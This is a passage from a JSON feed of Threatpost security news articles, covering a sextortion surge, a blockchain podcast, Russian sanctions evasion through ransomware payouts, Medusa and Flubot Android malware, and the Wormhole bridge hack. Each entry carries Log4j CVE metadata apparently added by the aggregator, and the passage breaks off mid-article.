800% in the last 4 months,\u201d he said.\n\nCampaigns targeting ordinary individuals are also spiking: The FBI\u2019s Internet Crime Complaint Center received more than [16,000 sextortion complaints](<https://www.ic3.gov/Media/Y2021/PSA210902>) in only the first seven months of 2021.\n\nWill this old-hat method of cyber attack prove effective? \u201cIt\u2019s too early to tell what the hit rate is on this technique,\u201d Casey Ellis, Founder and CTO of Bugcrowd, told Threatpost via email, \u201cbut it feels to me like a pivot that people would fall for. If a scam has a take of $500 and it costs 1 cent to send an email, you only have to connect 1 in 50,000 times for the scam to break even.\u201d\n\nTo Parkin, \u201cthe best defense is solid user education. No matter how successful an attacker is at getting past the filters, their attack can only succeed if the target falls for it and takes the bait.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T17:20:41", "type": "threatpost", "title": "Sextortion Rears Its Ugly Head Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T17:20:41", "id": "THREATPOST:B11E42D0B4C56E4CC482DEF6EA0B4AC7", "href": "https://threatpost.com/sextortion-rears-its-ugly-head-again/178595/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T14:20:09", "description": "Why in the world would a collection of nonfungible token (NFT) gorilla avatars called the Bored Ape Yacht Club (BAYC), run by 30-somethings using aliases like \u201cEmperor Tomato Ketchup\u201d and \u201cNo Sass\u201d and [adored by celebrities](<https://www.vanityfair.com/news/2022/02/bored-ape-yacht-club-revealed>), spiral on up to a [multibillion-dollar valuation](<https://www.coingecko.com/en/nft/bored-ape-yacht-club>) (\u2026and, by the way, how can you yourself get stinking crypto-rich?!)?\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30153635/Bored-Ape-Yacht-Club-NFT-300x300.jpeg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30153635/Bored-Ape-Yacht-Club-NFT-scaled-e1648669046321.jpeg>)\n\nImage of Bored Ape Yacht Club NFT.\n\nIf you don\u2019t have a clue, you might be one of the crypto-newbies for whom the New York Times recently pulled together its [Latecomer\u2019s Guide to Crypto](<https://www.nytimes.com/interactive/2022/03/18/technology/cryptocurrency-crypto-guide.html>) and whom [mutual funds companies](<https://www.fidelity.com/viewpoints/active-investor/beyond-bitcoin>) are trying to [ease into](<https://economictimes.indiatimes.com/markets/cryptocurrency/crypto-investment-in-mutual-funds-style-mudrex-launches-coin-sets/articleshow/87099763.cms?from=mdr>) the brave new world.\n\nYou also might have a thousand questions that go beyond cartoon apes and get into the nitty-gritty of how cryptocurrency and blockchain technologies work and how to sidestep the associated cybersecurity risks.\n\nThose risks are big, throbbing realities. The latest: Ronin, an Ethereum-linked blockchain platform for NFT-based video game Axie Infinity, on Tuesday put up a [blog post](<https://roninblockchain.substack.com/p/community-alert-ronin-validators?s=w>) advising that 173,600 ether tokens and 25.5 million USD coins \u2013 valued at nearly $620 million as of Tuesday \u2013 had been drained from its platform after an attacker used hacked private keys to forge two fake withdrawals last week.\n\nAccording to [Forbes](<https://www.forbes.com/sites/jonathanponciano/2022/03/29/second-biggest-crypto-hack-ever-600-million-in-ethereum-stolen-from-nft-gaming-blockchain/?sh=280f0f0c2686>), blockchain analytics firm Elliptic pegs it as the second-biggest hack ever.\n\n## New Technology, Old Hacks\n\nCryptocurrency and related technologies may be shiny new concepts, but the techniques crooks are using to drain them aren\u2019t necessarily newfangled. As of its Wednesday update, Ronin said that it looks like the breach was pulled off with old-as-the-hills social engineering:\n\n> \u201cWhile the investigations are ongoing, at this point we are certain that this was an external breach. All evidence points to this attack being socially engineered, rather than a technical flaw.\u201d \u20143/30/22 Ronin alert.\n\nDr. Lydia Kostopoulos, senior vice president of emerging tech insights at [KnowBe4](<https://www.knowbe4.com/>), stopped by the Threatpost podcast to give us an overview of this brave new world of blockchain: a landscape of new technologies that are making wallets swell and shrink and hearts to flutter in dismay when such things as the Ronin hack transpire.\n\nShe shared her insights into everything from how such technologies work to what the associated cybersecurity risks are, including:\n\n * How blockchain technologies, including NFTs, work.\n * The cybersecurity risks that might emerge from the use of NFTs/cryptocurrency, including popular scams/social engineering attempts circulating today.\n * Steps individuals/businesses can take to protect themselves.\n * What is driving their popularity and if NFTs are here to stay.\n * Regulations on blockchain technology.\n\nYou\u2019ve heard it a thousand times before, but Dr. Kostopoulos says it\u2019s real: Blockchain technology is transformative. Look out for state-backed currencies and blockchain-enabled voting that can\u2019t be tampered with, for starters. Look for NFT invitations to artists\u2019 performances that keep giving as those artists reward their ticket holders with future swag. And for the love of Pete, don\u2019t lose your cold wallets if you want to keep your crypto safe.\n\nIf you don\u2019t yet know what a cold wallet is, definitely have a listen!\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/032522_KnowBe4_Lydia_mixdown_2.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T13:00:09", "type": "threatpost", "title": "A Blockchain Primer and Bored Ape Headscratcher \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T13:00:09", "id": "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "href": "https://threatpost.com/a-blockchain-primer-and-a-bored-ape-headscratcher-podcast/179179/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T15:23:28", "description": "Russia may ramp up ransomware attacks against the United States as a way to ease the financial hurt it\u2019s under due to sanctions, U.S. federal authorities are warning. Those sanctions have been levied against the nation and Vladimir Putin\u2019s government due to its invasion of Ukraine.\n\nThe Financial Crimes Enforcement Network (FinCEN) issued a FinCEN Alert [(PDF)](<https://www.fincen.gov/sites/default/files/2022-03/FinCEN%20Alert%20Russian%20Sanctions%20Evasion%20FINAL%20508.pdf>) on Wednesday advising all financial institutions to remain vigilant against potential efforts to evade the expansive sanctions and other U.S.-imposed restrictions related to the current conflict. One way this may be done is to move cryptocurrency funds through ransomware payments collected after Russian state-sponsored actors carry out cyberattacks.\n\n\u201cIn the face of mounting economic pressure on Russia, it is vitally important for U.S. financial institutions to be vigilant about potential Russian sanctions evasion, including by both state actors and oligarchs,\u201d said FinCEN Acting Director Him Das [in a press statement.](<https://www.fincen.gov/news/news-releases/fincen-provides-financial-institutions-red-flags-potential-russian-sanctions>)\n\nFinancial actions taken against Russia by the U.S. Department of the Treasury\u2019s Office of Foreign Assets Control (OFAC) since the nation\u2019s invasion of Ukraine last month are numerous. They include:\n\n * Sanctions against persons who have financial operations in the Russian Federation, including Putin and Russia\u2019s Minister of Foreign Affairs Sergei Lavrov\n * Prohibitions on correspondent or payable-through account and payment processing and blocking of certain Russian financial institutions\n * Prohibitions related to new debt and equity for certain Russian entities\n * A prohibition on transactions involving certain Russian government entities, including the Central Bank of the Russian Federation.\n\nFinCEN now is urging financial institutions \u2013 including those with visibility into cryptocurrency or convertible virtual currency (CVC) flows, such as CVC exchangers and administrators \u2013 to identify and report suspicious activity associated with potential sanctions evasion quickly and conduct an investigation where appropriate.\n\nSo far FinCEN has not seen widespread evasion of sanctions using methods such as cryptocurrency, Das noted. However, \u201cprompt reporting of suspicious activity\u201d can ensure this remains the case to support U.S. efforts and interest in supporting Ukraine.\n\n## **Ramp-Up in Cyber-Attacks **\n\nIndeed, Russia state-sponsored actors already have ramped up cyber-attacks since the beginning of the conflict in the Ukraine; thus, an increase in ransomware activity is not an entirely unlikely prospect.\n\nResearchers at Google\u2019s Threat Analysis Group (TAG) [reported earlier this week](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) that they had observed advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government stepping up phishing attacks against Ukrainian and European targets, as well as distributed denial-of-service (DDoS) attacks against key government and service-oriented Ukrainian websites.\n\nBecause it is not regulated by typical financial currency laws in the United States, cryptocurrency has become a method of choice for cybercriminals to conduct transactions \u2013 including receiving payouts after ransomware attacks. For this reason, it also could be used by Russia to get around U.S. sanctions, noted one security professional.\n\n\u201cFor the tech savvy or oligarch with a need to move money, they can hire the talent to move the transactions,\u201d Rosa Smothers, senior vice president of cyber operations at security firm [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkOYxa_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYuYvpXdvb7-2BNsZCUHkZXL7ec2QLTY2-2FTBe03G8iVYPixd8Bov5GgH6DAKHGUqexQ-2B0nAYVFKMqkBKYw8YYPqfJNrlxOwOTBqCCKReqy6Kmv5Y9-2FNHt4zLkJVstDtTRBPXtmuX1dxVZT3q5fhWHsXeqv-2Fv1cJIX-2Fjlb-2FKnRhdADS-2BgZa5auC32i8V3U0ThbubhxXsqpIt03Hz1cjPy4L3tEOEdvhmz3jLvNd846SsHu-2Fk-3D>) and a former CIA cyber threat analyst and technical intelligence officer, observed in an email to Threatpost.\n\nHowever, while cryptocurrency does provide privacy for storage and process transactions, \u201cthe transparency provided by blockchain could make the movement of large amounts of cryptocurrency detectable by law enforcement,\u201d she noted, citing how the Department of Justice was able to [seize millions of dollars in Bitcoin](<https://threatpost.com/fbi-claws-back-millions-darksides-ransom/166705/>) that Colonial Pipeline paid to the DarkSide group after [a highly disruptive ransomware attack](<https://threatpost.com/pipeline-crippled-ransomware/165963/>) last May.\n\nIndeed, another security professional expressed doubt that Russia could use ransomware payments or any other type of cryptocurrency transactions to evade U.S. sanctions \u201cat any meaningful scale.\u201d\n\n\u201cThe magnitude of the recent sanction reaches into the billions, amounts that are large enough to be unattainable for almost all cryptocurrencies currently,\u201d observed Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel. \u201cThere may be opportunities at the individual level, but for the scale of nation-state operations and expenditures, a few million or even tens of millions aren\u2019t really going to move the needle.\u201d\n\nLike Smothers, he also noted that the transparency of blockchain technology due to its nature as \u201ca public ledger\u201d makes it easier for financial authorities to observe and trace suspicious cryptocurrency transactions than if sanctioned entities used \u201ctraditional money-laundering means.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n![](https://slack-imgs.com/?c=1&o1=ro&url=https%3A%2F%2Fmedia.threatpost.com%2Fwp-content%2Fuploads%2Fsites%2F103%2F2022%2F02%2F25090838%2FLog4J.jpg)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:10:04", "type": "threatpost", "title": "Russia May Use Ransomware Payouts to Avoid Sanctions", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:10:04", "id": "THREATPOST:3A1C8593C0AAEFA3AF77D1A207BD0B65", "href": "https://threatpost.com/russia-ransomware-payouts-avoid-sanctions/178854/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Flubot, the Android spyware that\u2019s been spreading virally since last year, has hitched its infrastructure wagon up to another mobile threat known as Medusa.\n\nThat\u2019s according to ThreatFabric, which found that Medusa is now being distributed through the same SMS-phishing infrastructure as Flubot, resulting in high-volume, side-by-side campaigns.\n\nThe Flubot malware (aka Cabassous) is delivered to targets through SMS texts that prompt them to install a \u201cmissed package delivery\u201d app or a faux version of Flash Player. If a victim falls for the ruse, the malware is installed, which adds the infected device to a botnet. Then, it sets about gaining permissions, stealing banking information and credentials, lifting passwords stored on the device and squirreling away various pieces of personal information.\n\nThe malicious implant also sends out additional text messages to the infected device\u2019s contact list, which allows it [to \u201cgo viral\u201d](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) \u2013 like the flu.\n\nApparently, Medusa likes the cut of Flubot\u2019s jib: \u201cOur threat intelligence shows that Medusa followed with exactly the same app names, package names and similar icons,\u201d ThreatFabric researchers noted in a [Monday analysis](<https://www.threatfabric.com/blogs/partners-in-crime-medusa-cabassous.html>). \u201cIn less than a month, this distribution approach allowed Medusa to reach more than 1,500 infected devices in one botnet, masquerading as DHL.\u201d\n\nAnd that\u2019s just for one botnet. ThreatFabric pointed out that Medusa has multiple botnets carrying out multiple campaigns.\n\nUnlike Flubot, which [mainly spreads](<https://threatpost.com/flubot-spyware-android-devices/165607/>) in Europe, Medusa is more of an equal-opportunity threat when it comes to geography. Recent campaigns have targeted users from Canada, Turkey and the United States.\n\n\u201cAfter targeting Turkish financial organizations in its first period of activity in 2020, Medusa has now switched its focus to North America and Europe, which results in [a] significant number of infected devices,\u201d ThreatFabric researchers noted. \u201cPowered with multiple remote-access features, Medusa poses a critical threat to financial organizations in targeted regions.\u201d\n\n## **Medusa Bursts on the Scene**\n\nFirst discovered in July 2020, Medusa (related to the Tanglebot family of RATs) is a mobile banking trojan that can gain near-complete control over a user\u2019s device, including capabilities for keylogging, banking trojan activity, and audio and video streaming. To boot, it has received several updates and improved in its obfuscation techniques as it hops on Flubot\u2019s infrastructure coattails, researchers said.\n\nFor one, it now has an accessibility-scripting engine that allows actors to perform a set of actions on the victim\u2019s behalf, with the help of Android Accessibility Service.\n\n\u201cBy abusing Accessibility Services, Medusa is able to execute commands on any app that is running on a victim\u2019s device,\u201d researchers noted. \u201cA command like \u2018fillfocus\u2019 allows the malware to set the text value of any specific text box to an arbitrary value chosen by the attacker, e.g., the beneficiary of a bank transfer.\u201d\n\nAccessibility events logging is a companion upgrade to the above. With a special command, Medusa can collect information about active windows, including the position of fields and certain elements within a user interface, any text inside those elements, and whether the field is a password field.\n\n\u201cHaving all the data collected the actor is able to get a better understanding of the interface of different applications and therefore implement relevant scenarios for accessibility scripting feature,\u201d according to ThreatFabric. \u201cMoreover, it allows actor(s) to have deeper insight on the applications the victim uses and their typical usage, while also [being able] to intercept some private data.\u201d\n\nThe following snippet shows the code that collects the information of active window going through its nodes:\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/07171257/code-snippet.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/07171257/code-snippet.png>)\n\nSource: ThreatFabric.\n\nFurther, in examining Medusa\u2019s back-end panels, researchers observed the malware\u2019s operators marking banking apps with a \u201cBANK\u201d tag, to control/log the input fields.\n\n\u201cThis means that any banking app in the world is at risk to this attack, even those who do not fall within the current target list,\u201d they warned.\n\nThe command-and-control server (C2) can also command Medusa to carry out a wide variety of RAT work, including clicking on a specific UI element, sleeping, screenshotting, locking the screen, providing a list of recent apps and opening recent notifications.\n\n## **Flubot Evolves Its Capabilities**\n\nThe researchers also noticed that the addition of Medusa to the mix hasn\u2019t slowed down Flubot\u2019s own development. They explained that it now has a \u201cnovel capability never seen before in mobile banking malware.\u201d\n\nTo wit: In version 5.4, Medusa picked up the ability to abuse the \u201cNotification Direct Reply\u201d feature of Android OS, which allows the malware to directly reply to push notifications from targeted applications on a victim\u2019s device. The user isn\u2019t aware of the activity, so Flubot can thus intercept them \u2013 opening the door to thwarting two-factor authentication and more, researchers said.\n\n\u201cEvery minute the malware sends the statistics to the C2 about the notifications received,\u201d they explained. \u201cAs a response, it might receive a template string that will be used to re-create an object of intercepted notification with updated parameters, thus allowing [Flubot] authors to arbitrarily change notification content\u2026We believe that this previously unseen capability can be used by actors to sign fraudulent transactions on [a] victim\u2019s behalf, thus making notifications [a] non-reliable authentication/authorization factor on an infected device.\u201d\n\nAnother potential abuse of this functionality could be to respond to social-application interactions with \u201cnotifications\u201d containing malicious phishing links.\n\n\u201cConsidering the popularity of these type of apps and the strong focus of [Flubot] on distribution tactics, this could easily be the main MO behind this new Notification Direct Reply Abuse,\u201d according to ThreatFabric.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T22:13:29", "type": "threatpost", "title": "Medusa Malware Joins Flubot's Android Distribution Network", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T22:13:29", "id": "THREATPOST:10245D9804511A09607265485D240FFF", "href": "https://threatpost.com/medusa-malware-flubot-android-distribution/178258/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Wormhole \u2013 a web-based blockchain \u201cbridge\u201d that enables users to convert cryptocurrencies \u2013 said on Thursday that \u201call funds are safe\u201d after attackers abused a vulnerability to shake it down for 120,000 Ethereum (approximately $314 million).\n\nIn a postmortem shared with Threatpost on Thursday, blockchain security and smart-auditing company CertiK said that its preliminary analysis indicates that \u201cthe attacker exploited a mint function on the Solana side of the Wormhole bridge to create 120,000 wETH [wrapped Ethereum] for themselves, then used these minted tokens to claim ETH that was held on the Ethereum side of the bridge.\u201d\n\nAs far as negotiation attempts go, CertiK said that the Wormhole team left a message to the attacker stating, \u201cWe noticed you were able to exploit the Solana VAA verification and mint tokens. We\u2019d like to offer you a white-hat agreement, and present you a bug bounty of $10 million for exploit details, and return the wETH you\u2019ve minted. You can reach out to us at[ contact@certus.one](<https://t.nylas.com/t1/222/6go6zh11n354zj4gtfyydtk2j/0/7e3f0565dba6ac71abf6ccdb740c5697cd8db828b0852af88c0c054ee28bb3c2>).\u201d\n\nIts total on the heist differs a bit from that of Wormhole: CertiK\u2019s analysis showed that the attacker got away with 93,750 ETH ($251 million), 432,662 SOL ($46.6 million) and 4.14 million in USD Coin (USDC) ($4.14 million), for a total of $302,495,717.\n\nThis is the [second-largest hack](<https://defiyield.app/rekt-database>) of a decentralized finance (DeFi) platform, second only to the Poly Network (ETH) exploit, in which an attacker ripped off about $602 million. That attacker reportedly went on to [pay it back](<https://threatpost.com/poly-network-recoups-610m-stolen-from-defi-platform/168906/>), however, after accepting a gig as chief security advisor with Poly Network.\n\nIn an early-morning [tweet](<https://twitter.com/wormholecrypto/status/1489233259808571401>) on Thursday, the official Wormhole Twitter account confirmed that it had been raided for 120,000 ETH, but that the vulnerability is now patched.\n\n> 1/2\n> \n> All funds have been restored and Wormhole is back up.\n> \n> We're deeply grateful for your support and thank you for your patience.\n> \n> \u2014 Wormhole\ud83c\udf2a (@wormholecrypto) [February 3, 2022](<https://twitter.com/wormholecrypto/status/1489232008521859079?ref_src=twsrc%5Etfw>)\n\nWormhole\u2019s Portal \u2013 its token bridge \u2013 was back up as of 13:29 UTC, the team said.\n\n## A \u2018Rather Common\u2019 Programming Error\n\nRoger Grimes, data driven defense evangelist for KnowBe4, told Threatpost on Thursday that the attack was successful because of what he called a \u201crather common\u201d programming error.\n\n\u201cThe function inside of the multiple nested smart contracts which was supposed to verify the signature was not coded to ensure the integrity check actually happened,\u201d he exlained via email. \u201cSo there was no integrity guaranteed in the integrity check. Yeah, that is a problem.\u201d\n\n## Why So Popular?\n\nCertiK said that the bridge\u2019s popularity meant that it had become the dominant bridge between Solana and Ethereum, \u201cand as such was responsible for a large proportion of all wrapped Ethereum on the Solana blockchain.\u201d\n\n020322 14:54 UPDATE: Added CertiK\u2019s analysis of Wormhole\u2019s 1:1 ratio of ETH to wETH. \n\nAs CertiK explained in its postmortem, the bridge held a 1:1 ratio of ETH to wETH, \u201cacting essentially as an escrow service.\u201d But the theft broke that 1:1 peg, leading to what CertiK said was \u201cat least 93,750 less ETH held as collateral.\u201d\n\nIt didn\u2019t bode well for the financial health of Solana, the firm pointed out. If that ratio hadn\u2019t been regained, DeFi on Solana was at risk of \u201ca mass liquidation event,\u201d according to the its analysis.\n\nBut given that Wormhole on Thursday indicated that its backers \u2013 whoever they may be \u2013 had put up the funds necessary to return the peg to a 1:1 backing, the collateralization of wETH on Solana was restored. \n\nAll well and good, but still, investors\u2019 gonads shrunk in response to the massive heist: The price of Solana, which outpaced both Bitcoin and Ethereum last year, was in [freefall](<https://www.forbes.com/sites/billybambrough/2022/02/03/crypto-price-alert-ethereum-rival-solana-suddenly-in-free-fall-after-huge-325-million-hack/?sh=442f39b04bb5>) Thursday morning. It was selling at $97.69 as of 12:50 ET, down 10 percent since the details of the theft were revealed. Solana had hit a high of $260 in November 2021. Ethereum is also giving investors the hives, having dropped about 5 percent as of the same time on Thursday.\n\nAt this point, the full extent of this attack \u201cstill remains to be seen,\u201d CertiK said. It could turn out to be a precursor to other attacks, the firm suggested, if, for example, Wormhole\u2019s bridge to a different cryptocurrency \u2013 the Terra blockchain \u2013 shares the same vulnerability as its Solana bridge.\n\n## Who Bailed Out Wormhole?\n\nThe Wormhole team didn\u2019t specify who dug into what must be some seriously deep pockets to back-fill all that money. The Twitterverse, of course, had hypotheses, including that perhaps it was Alameda Research: a cryptocurrency quantitative trading firm and liquidity provider that claims to \u201cmanage over $70 million in digital assets and trade around $1 billion per day across thousands of products: all major coins and altcoins, and their derivatives.\u201d\n\n\u201cIt was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books),\u201d suggested one Twitter user.\n\n> Alameda probably bailed them out, it was either dilute their equity to infinity with $300 million bail out or watch all of Solana ecosystem crash and burn (which would have costed Alameda more than $300 million on their books)\n> \n> \u2014 ichioku (@1chioku) [February 3, 2022](<https://twitter.com/1chioku/status/1489240858017021956?ref_src=twsrc%5Etfw>)\n\nAlameda hasn\u2019t made a public statement on the matter. Wormhole has promised a detailed incident report as soon as possible.\n\n## Crypto\u2019s Cutting Edge Gets a Nasty Cut\n\nRonghui Gu, co-founder and professor of CertiK, told Threatpost on Thursday that clearly this Wormhole exploit isn\u2019t the first of its kind, and obviously, it won\u2019t be the last.\n\n\u201cWe saw another cross-chain bridge exploited less than a week ago, when Qubit Finance lost $80 million,\u201d Gu pointed out, referring to an attack [confirmed](<https://blockworks.co/defi-protocol-qubit-finance-loses-80m-in-hack/#:~:text=Hackers%20have%20stolen%20%2480%20million,ever%2C%20DeFiYield%20Rekt%20data%20shows.>) by the DeFi protocol Qubit Finance on Friday.\n\nThe attackers reportedly made off with 206,809 Binance coins through Qubit\u2019s QBridge deposit function, making it the seventh-largest DeFi hack ever.\n\nExpect more of the same when it comes to bridge exploits, Gu said, given insatiable demand for these technologies. \u201cWe seem to be at an awkward point where the demand for cross-chain infrastructure is far outpacing the industry\u2019s ability to build services securely,\u201d he told Threatpost via email.\n\nOf course, there\u2019s always the \u201cbecause that\u2019s where the money is\u201d rationale, Gu noted: \u201cBridges are an attractive target for hackers: they hold millions of dollars of tokens in what is essentially an escrow contract, and by operating across multiple chains they multiply their potential points of failure.\u201d\n\nThreat actors follow the money, he said, and those on the cutting edge of cryptocurrency technology can get bumped off as a result: \u201cA lot of money goes to the newest, most exciting ecosystems. The price that the most adventurous DeFi explorers pay is a heightened risk of falling victim to these exploits of innovative but ultimately insecure platforms.\u201d\n\n## A Need for Secure Development Lifecycle\n\nWhere there is software, there are bugs. Grimes pointed to the attack as being a case in point about the need for training in secure development lifecycle (SDL) coding. \u201cSDL teaches developers about common exploitable bugs and how to avoid putting it into their own code,\u201d he explained. \u201cIt teaches about using bug checking tools, using coding tools that automatically rule out as many security bugs as they can, and in general, puts security into the whole lifecycle of developing something, be it a traditional program, smart phone app or smart contract.\u201d\n\nBut there\u2019s a bigger underlying problem, he noted: Namely, most developers and smart contract creators, aren\u2019t trained in SDL and \u201cget little to no training in secure development. So, these sorts of bugs are going to creep in and bad actors are going to take advantage of them.\u201d\n\nOne thing to note is that the cryptocurrency world is full of trillions of dollars, but it\u2019s still at the toddler stage. \u201cIt is an immature industry using immature code, and like all new industries, it is moving ahead at warp speed, good security be damned,\u201d Grimes said.\n\nWhereas it\u2019s getting harder for bad actors and bug hunters to find really good exploits in Microsoft Windows, Macs, Linux and Google ChromeOS, these platforms are maturing, making it tougher to pull them apart, he said. That includes the experienced coders, tools and the protective mechanisms of the operating systems themselves.\n\nNot so with the cryptocurrency world, Grimes said, which is the mirror opposite.\n\n\u201cIt is built on very secure protocols and algorithms, but then a lot of very immature and buggy applications are built on top of it,\u201d he observed.\n\nHe compared it to putting your door key in your potted plant in front of the door: \u201cSometimes all a thief has to do is look. And that is what hackers exploiting cryptocurrency are doing. They are taking their traditional methods for hunting bugs and using them against immature cryptocurrency applications. And viola, they are finding lots of exploitable bugs.\u201d\n\nAnd once the money\u2019s gone bye-bye, 